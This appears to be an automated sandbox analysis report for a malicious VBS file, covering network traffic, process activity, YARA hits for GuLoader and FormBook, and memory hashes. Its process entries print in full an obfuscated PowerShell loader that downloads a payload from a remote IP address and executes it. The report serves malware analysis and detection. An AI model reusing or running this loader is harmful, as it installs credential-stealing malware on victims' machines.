                                                                            Apr 25, 2024 11:03:38.801310062 CEST1289INData Raw: de 65 86 14 a8 d1 3e 27 39 ad ed 3d 80 08 29 d8 4a 2a 47 b7 fa 48 42 a0 af e4 0d b4 f2 3c 6b 8d 9d 57 1b 18 fa b1 69 fa f1 2c 64 22 cd 41 48 26 d8 e3 4a 02 c0 60 59 40 75 b0 66 fa e7 51 a1 77 04 e8 66 a9 5a 3b e2 22 81 d9 7e 86 f6 60 0a fa 81 6d
                                                                            Data Ascii: e>'9=)J*GHB<kWi,d"AH&J`Y@ufQwfZ;"~`m_xE~laH`5ky#7G`XyA'>##/%,ND2aUhMu803U4cOUIB^r`O[fzW#4.srfT+_I
                                                                            Apr 25, 2024 11:03:39.008639097 CEST1289INData Raw: 4b 6e b4 06 6b d2 58 b9 d5 77 62 72 16 f7 54 5b 8e 40 1b 71 bb 8e 83 a5 05 67 e3 b5 0f a5 88 03 ee 03 0d 11 d4 b4 76 0b 21 4c c4 b3 8a 6b 9a 5f 45 da cb a3 20 2d 38 8e a1 bb a7 17 a8 ee 4e cf 04 a9 d2 a3 03 0b 25 c6 aa 42 60 5f fd 6f a9 57 ea 45
                                                                            Data Ascii: KnkXwbrT[@qgv!Lk_E -8N%B`_oWE:W9hq?(?S*]K%s)d[-TC>OCM~{tX6XDtu&3f*_]~3Nga_x7RJ=>j3PZ>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.54971747.91.88.207804088C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Apr 25, 2024 11:04:26.578949928 CEST542OUTGET /gnbc/?TjZX=EdG8rNSX_ZztGDlp&fLe=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en
                                                                            Connection: close
                                                                            Host: www.tyaer.com
                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                            Apr 25, 2024 11:04:26.813661098 CEST1254INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.20.1
                                                                            Date: Thu, 25 Apr 2024 09:04:26 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Trace: 2B10BE8A762AE81CED627A4E1A7A9358CAAB5846793A1442B0047BEFEB01
                                                                            Set-Cookie: _csrf=9b895372084a89fe8c8a5bba3c43db46315c9bdef088af03cbbed36579c8d55ea%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%220HbANrynv9OLPgrRc6bwtTZQ9wGPFTw0%22%3B%7D; path=/; HttpOnly
                                                                            Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 78 5a 57 78 44 37 4e 6b 77 79 69 38 74 71 59 67 4b 79 4c 42 77 49 42 77 6d 78 73 4c 7a 53 6f 31 41 38 5f 56 62 72 50 5f 47 77 48 31 33 64 4e 4f 5f 52 61 36 52 73 71 50 36 57 78 37 52 62 4f 53 34 30 62 35 62 48 2d 5a 63 47 51 36 75 4a 49 2d 39 61 74 73 4d 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="xZWxD7Nkwyi8tqYgKyLBwIBwmxsLzSo1A8_VbrP_GwH13dNO_Ra6RsqP6Wx7RbOS40b5bH-ZcGQ6uJI-9atsMQ=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></body></html>0


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:11:02:52
                                                                            Start date:25/04/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs"
                                                                            Imagebase:0x7ff66aeb0000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:11:02:57
                                                                            Start date:25/04/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7 7 8 2R2H, 2 6 6,5P1U)V ');Funmaker $Laryngotome;"
                                                                            Imagebase:0x7ff7be880000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2761711892.000001CB10070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:11:02:57
                                                                            Start date:25/04/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:11:02:59
                                                                            Start date:25/04/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"
                                                                            Imagebase:0x7ff7b09c0000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:11:03:09
                                                                            Start date:25/04/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7 7 8 2R2H, 2 6 6,5P1U)V ');Funmaker $Laryngotome;"
                                                                            Imagebase:0x300000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2487176127.0000000008CD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2487767026.000000000A034000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2478265897.0000000006060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:11:03:11
                                                                            Start date:25/04/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"
                                                                            Imagebase:0x790000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:11:03:31
                                                                            Start date:25/04/2024
                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                            Imagebase:0x8a0000
                                                                            File size:516'608 bytes
                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2821245767.0000000025220000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2802296347.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:11:04:04
                                                                            Start date:25/04/2024
                                                                            Path:C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe"
                                                                            Imagebase:0x1b0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:11
                                                                            Start time:11:04:06
                                                                            Start date:25/04/2024
                                                                            Path:C:\Windows\SysWOW64\AtBroker.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\AtBroker.exe"
                                                                            Imagebase:0x4d0000
                                                                            File size:68'608 bytes
                                                                            MD5 hash:D5B61959A509BDA85300781F5A829610
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3309988573.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3309922219.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:12
                                                                            Start time:11:04:24
                                                                            Start date:25/04/2024
                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                            Imagebase:0x8a0000
                                                                            File size:516'608 bytes
                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:13
                                                                            Start time:11:04:24
                                                                            Start date:25/04/2024
                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                            Imagebase:0x7ff6a6430000
                                                                            File size:71'680 bytes
                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:14
                                                                            Start time:11:04:31
                                                                            Start date:25/04/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff79f9e0000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:15
                                                                            Start time:11:04:32
                                                                            Start date:25/04/2024
                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                            Imagebase:0x8a0000
                                                                            File size:516'608 bytes
                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Reset < >
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2791172778.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e4f063610e38730a7a930dbd016b75256311c5fe3984b209a88c0e3f333c548b
                                                                              • Instruction ID: 0e3b916478267f4a65a4b79ae08baf34502eeafd102d593330ebd8020959e4fa
                                                                              • Opcode Fuzzy Hash: e4f063610e38730a7a930dbd016b75256311c5fe3984b209a88c0e3f333c548b
                                                                              • Instruction Fuzzy Hash: B9F1923090CA8D8FEBA8EF28D8557E937E1FF54350F04426EE84DC7291DB35A9458B86
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2791172778.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6ba59bec01ce75b2ba699518f469c223d661bff19dc1ef61e936fb60bc8e7c18
                                                                              • Instruction ID: eac663f939d128fc328513d78742f837f79736adf595ab1073052c8edd893a71
                                                                              • Opcode Fuzzy Hash: 6ba59bec01ce75b2ba699518f469c223d661bff19dc1ef61e936fb60bc8e7c18
                                                                              • Instruction Fuzzy Hash: 44E1A03090CA8D8FEBA8EF28D8557E977E1FB54350F14426EE84DC72D1CB79A9408B85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

